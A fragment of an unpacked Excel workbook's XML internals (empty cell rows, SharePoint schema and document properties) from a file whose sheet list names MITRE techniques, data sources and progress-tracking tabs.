      <c r="I23" s="24"/>
      <c r="J23" s="24"/>
      <c r="K23" s="24"/>
      <c r="L23" s="24"/>
      <c r="M23" s="24"/>
      <c r="N23" s="24"/>
      <c r="O23" s="24"/>
    </row>
    <row r="24" spans="2:15" x14ac:dyDescent="0.25">
      <c r="B24" s="24"/>
      <c r="C24" s="24"/>
      <c r="D24" s="24"/>
      <c r="E24" s="24"/>
      <c r="F24" s="24"/>
      <c r="G24" s="24"/>
      <c r="H24" s="24"/>
      <c r="I24" s="24"/>
      <c r="J24" s="24"/>
      <c r="K24" s="24"/>
      <c r="L24" s="24"/>
      <c r="M24" s="24"/>
      <c r="N24" s="24"/>
      <c r="O24" s="2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4627A170B691A46995E549C4CCBDF6E" ma:contentTypeVersion="4" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="35d7a29a3b7b546bd3ae166d076c2b31">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="a2a0fe9c-82b5-40a3-895e-658c14a580bf" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="cc4a7a489d0b35007c0a3cc8b53a2c1d" ns2:_="">
    <xsd:import namespace="a2a0fe9c-82b5-40a3-895e-658c14a580b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a0fe9c-82b5-40a3-895e-658c14a580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A8A9B0-84CB-42D4-A832-BC0E65F593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a0fe9c-82b5-40a3-895e-658c14a580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732187-838C-4699-BF02-8419C2C5C876}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{69845F22-ECED-4DD6-B83F-A1B3B4FF552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Mitre Techniques</vt:lpstr>
      <vt:lpstr>Data Sources</vt:lpstr>
      <vt:lpstr>legends</vt:lpstr>
      <vt:lpstr>Basic Progress</vt:lpstr>
      <vt:lpstr>Advanced Progress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 c</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Yogesh Chavarkar</cp:lastModifiedBy>
  <cp:revision/>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-03-22T23:09:25Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-18T04:47:18Z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0x01010024627A170B691A46995E549C4CCBDF6E</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="xd_ProgID">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ComplianceAssetId">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="TemplateUrl">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="_ExtendedDescription">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="TriggerFlowInfo">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="xd_Signature">
    <vt:bool>false</vt:bool>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="MediaServiceImageTags">
    <vt:lpwstr/>
  </property>
</Properties>
</file>